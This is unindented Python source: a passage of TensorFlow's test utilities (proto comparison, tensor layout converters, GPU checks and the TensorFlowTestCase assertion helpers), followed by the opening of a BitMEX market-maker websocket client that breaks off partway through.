raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(len(a_value.bytes_list.value),
len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(
a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, attr_tensor_string_value)):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {
4: [0, 3, 1, 2],
5: [0, 4, 1, 2, 3]
}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {
4: [0, 2, 3, 1],
5: [0, 2, 3, 4, 1]
}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
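# Editor's note (hedged illustration): when given a plain shape list instead of a
# Tensor, the helpers above simply permute the entries, e.g.:
#
#   NHWCToNCHW([32, 224, 224, 3])  -> [32, 3, 224, 224]
#   NCHWToNHWC([32, 3, 224, 224])  -> [32, 224, 224, 3]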
# TODO(skyewm): remove this eventually
# pylint: disable=protected-access
def _use_c_api_wrapper(fn, use_c_api, *args, **kwargs):
prev_value = ops._USE_C_API
ops._USE_C_API = use_c_api
try:
with ops.Graph().as_default():
fn(*args, **kwargs)
finally:
ops._USE_C_API = prev_value
# pylint: disable=protected-access
# TODO(skyewm): remove this eventually
def disable_c_api(fn):
"""Decorator for disabling the C API on a test.
Note this disables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
return lambda *args, **kwargs: _use_c_api_wrapper(fn, False, *args, **kwargs)
# TODO(skyewm): remove this eventually
def enable_c_api(fn):
"""Decorator for enabling the C API on a test.
Note this enables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
return lambda *args, **kwargs: _use_c_api_wrapper(fn, True, *args, **kwargs)
def run_in_graph_and_eager_modes(__unused__=None, graph=None, config=None,
use_gpu=False, force_gpu=False,
reset_test=True):
"""Runs the test in both graph and eager modes.
Args:
    __unused__: Prevents silently skipping tests.
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
reset_test: If True, tearDown and SetUp the test case again.
Returns:
Returns a decorator that will run the decorated test function
using both a graph and using eager execution.
"""
assert not __unused__, "Add () after run_in_graph_and_eager_modes."
def decorator(f):
"""Test method decorator."""
def decorated(self, **kwargs):
"""Decorated the test method."""
with context.graph_mode():
with self.test_session(graph, config, use_gpu, force_gpu):
f(self, **kwargs)
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self.setUp()
def run_eager_mode():
if force_gpu:
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with context.device(gpu_name):
f(self)
elif use_gpu:
          # TODO(xpan): Support soft placement and gpu by default when available.
f(self, **kwargs)
else:
with context.device("/device:CPU:0"):
f(self, **kwargs)
eager_graph = graph or ops.Graph()
with context.eager_mode():
with eager_graph.as_default():
run_eager_mode()
return decorated
return decorator
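# Editor's note (hedged illustration): typical use of the decorator above inside a
# test case; `MyOp` is a placeholder, not part of this module.
#
#   class MyOpTest(test_util.TensorFlowTestCase):
#
#     @test_util.run_in_graph_and_eager_modes()
#     def testMyOp(self):
#       x = MyOp([1.0, 2.0])
#       self.assertAllClose(self.evaluate(x), [2.0, 4.0])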
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(local_device.physical_device_desc)
>= min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
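# Editor's note (hedged illustration): inside a test, `device(use_gpu=True)` places
# ops on the GPU only when one is actually available; `my_op` and `x` are
# placeholders.
#
#   with test_util.device(use_gpu=True):
#     result = my_op(x)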
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
ops.get_default_graph().seed = random_seed.DEFAULT_GRAPH_SEED
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
    If you call this method multiple times during a test, it will return the
    same folder. However, across different runs the directories will be
    different. This ensures that tests run at different times cannot pollute
    each other's environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
def _AssertProtoEquals(self, a, b):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
    for floating point attributes, and then uses assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True)
def assertProtoEquals(self, expected_message_maybe_ascii, message):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
"""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(expected_message_maybe_ascii, expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message)
else:
assert False, ("Can't compare protos of type %s and %s" %
(type(expected_message_maybe_ascii), type(message)))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_helper(self, tensors):
if isinstance(tensors, ops.EagerTensor):
return tensors.numpy()
if isinstance(tensors, resource_variable_ops.ResourceVariable):
return tensors.read_value().numpy()
if isinstance(tensors, tuple):
return tuple([self._eval_helper(t) for t in tensors])
elif isinstance(tensors, list):
return [self._eval_helper(t) for t in tensors]
elif isinstance(tensors, dict):
assert not tensors, "Only support empty dict now."
return dict()
else:
raise ValueError("Unsupported type.")
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.in_eager_mode():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
    This method behaves differently from session.Session: for performance reasons
`test_session` will by default (if `graph` is None) reuse the same session
across tests. This means you may want to either call the function
`reset_default_graph()` before tests, or if creating an explicit new graph,
pass it here (simply setting it with `as_default()` won't do it), which will
trigger the creation of a new session.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
    `force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
    `use_gpu` is True, TensorFlow tries to run as many ops on the GPU as possible.
    If both `force_gpu` and `use_gpu` are False, all ops are pinned to the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
          self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
      elif force_gpu and config.allow_soft_placement:
        # ConfigProto.CopyFrom() returns None, so copy into a new proto explicitly.
        new_config = config_pb2.ConfigProto()
        new_config.CopyFrom(config)
        config = new_config
        config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.arithmetic_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
if graph is None:
if self._cached_session is None:
self._cached_session = session.Session(
graph=None, config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
        self._testcase.failureException: If the thread terminates due to
          an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
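  # Editor's note (hedged illustration): a checked thread must be joined before the
  # test ends so that exceptions raised inside it fail the test; `my_worker` and
  # `work_queue` are placeholders.
  #
  #   def testWorker(self):
  #     t = self.checkedThread(target=my_worker, args=(work_queue,))
  #     t.start()
  #     t.join()  # re-raised as a test failure if my_worker raised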
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
self.assertTrue(
math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
"""
self.assertEqual(len(farray1), len(farray2))
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err))
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b), np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
print("dtype = %s, shape = %s" % (a.dtype, a.shape))
np.testing.assert_allclose(a, b, rtol=rtol, atol=atol, err_msg=msg)
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6):
"""Asserts that two numpy arrays, or dicts of same, have near values.
This does not support nested dicts.
Args:
      a: The expected numpy ndarray (or anything that can be converted to one),
        or dict of same. Must be a dict iff `b` is a dict.
      b: The actual numpy ndarray (or anything that can be converted to one),
        or dict of same. Must be a dict iff `a` is a dict.
rtol: relative tolerance.
atol: absolute tolerance.
Raises:
ValueError: if only one of `a` and `b` is a dict.
"""
is_a_dict = isinstance(a, dict)
if is_a_dict != isinstance(b, dict):
raise ValueError("Can't compare dict to non-dict, %s vs %s." % (a, b))
if is_a_dict:
self.assertItemsEqual(
a.keys(), b.keys(),
msg="mismatched keys, expected %s, got %s" % (a.keys(), b.keys()))
for k in a:
self._assertArrayLikeAllClose(
a[k], b[k], rtol=rtol, atol=atol,
msg="%s: expected %s, got %s." % (k, a, b))
else:
self._assertArrayLikeAllClose(a, b, rtol=rtol, atol=atol)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
      a: the expected numpy ndarray, or anything that can be converted to one.
      b: the actual numpy ndarray, or anything that can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol)
def assertAllEqual(self, a, b):
"""Asserts that two numpy arrays have the same values.
Args:
      a: the expected numpy ndarray, or anything that can be converted to one.
      b: the actual numpy ndarray, or anything that can be converted to one.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
same = (a == b)
if a.dtype == np.float32 or a.dtype == np.float64:
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(a, b)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" % (str(type(e)),
str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(np_array.shape, tf_tensor.get_shape().as_list())
def assertDeviceEqual(self, device1, device2):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(device1, device2,
"Devices %s and %s are not equal" % (device1, device2))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
def create_local_cluster(num_workers, num_ps, protocol="grpc",
worker_config=None, ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in
the documentation of `tf.train.Server`.
worker_config: (optional) ConfigProto to initialize workers. Can be used
to instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs, job_name="worker", protocol=protocol, task_index=ix,
config=worker_config, start=True)
for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs, job_name="ps", protocol=protocol, task_index=ix,
config=ps_config, start=True)
for ix in range(num_ps)
]
return workers, ps_servers
|
ws_thread.py
|
import sys
import websocket
import threading
import traceback
import ssl
from time import sleep
import json
import decimal
import logging
from market_maker.settings import settings
from market_maker.auth.APIKeyAuth import generate_expires, generate_signature
from market_maker.utils.log import setup_custom_logger
from market_maker.utils.math import toNearest
from future.utils import iteritems
from future.standard_library import hooks
with hooks(): # Python 2/3 compat
from urllib.parse import urlparse, urlunparse
# Connects to BitMEX websocket for streaming realtime data.
# The Marketmaker still interacts with this as if it were a REST Endpoint, but now it can get
# much more realtime data without heavily polling the API.
#
# The Websocket offers a bunch of data as raw properties right on the object.
# On connect, it synchronously asks for a push of all this data then returns.
# Right after, the MM can start using its data. It will be updated in realtime, so the MM can
# poll as often as it wants.
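#
# Hedged usage sketch (editor's addition; the endpoint is the testnet URL used in the
# __main__ block at the bottom of this file, and the symbol is an example only):
#
#   ws = BitMEXWebsocket()
#   ws.connect("https://testnet.bitmex.com/api/v1", symbol="XBTUSD", shouldAuth=False)
#   ticker = ws.get_ticker("XBTUSD")   # dict with 'last', 'buy', 'sell', 'mid'
#   trades = ws.recent_trades()        # raw rows from the 'trade' table
#   ws.exit()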
class BitMEXWebsocket():
# Don't grow a table larger than this amount. Helps cap memory usage.
MAX_TABLE_LEN = 200
def __init__(self):
self.logger = logging.getLogger('root')
self.__reset()
def __del__(self):
self.exit()
def connect(self, endpoint="", symbol="XBTN15", shouldAuth=True):
'''Connect to the websocket and initialize data stores.'''
self.logger.debug("Connecting WebSocket.")
self.symbol = symbol
self.shouldAuth = shouldAuth
# We can subscribe right in the connection querystring, so let's build that.
# Subscribe to all pertinent endpoints
subscriptions = [sub + ':' + symbol for sub in ["quote", "trade"]]
subscriptions += ["instrument"] # We want all of them
if self.shouldAuth:
subscriptions += [sub + ':' + symbol for sub in ["order", "execution"]]
subscriptions += ["margin", "position"]
# Get WS URL and connect.
urlParts = list(urlparse(endpoint))
urlParts[0] = urlParts[0].replace('http', 'ws')
urlParts[2] = "/realtime?subscribe=" + ",".join(subscriptions)
wsURL = urlunparse(urlParts)
self.logger.info("Connecting to %s" % wsURL)
self.__connect(wsURL)
self.logger.info('Connected to WS. Waiting for data images, this may take a moment...')
# Connected. Wait for partials
self.__wait_for_symbol(symbol)
if self.shouldAuth:
self.__wait_for_account()
self.logger.info('Got all market data. Starting.')
#
# Data methods
#
def get_instrument(self, symbol):
instruments = self.data['instrument']
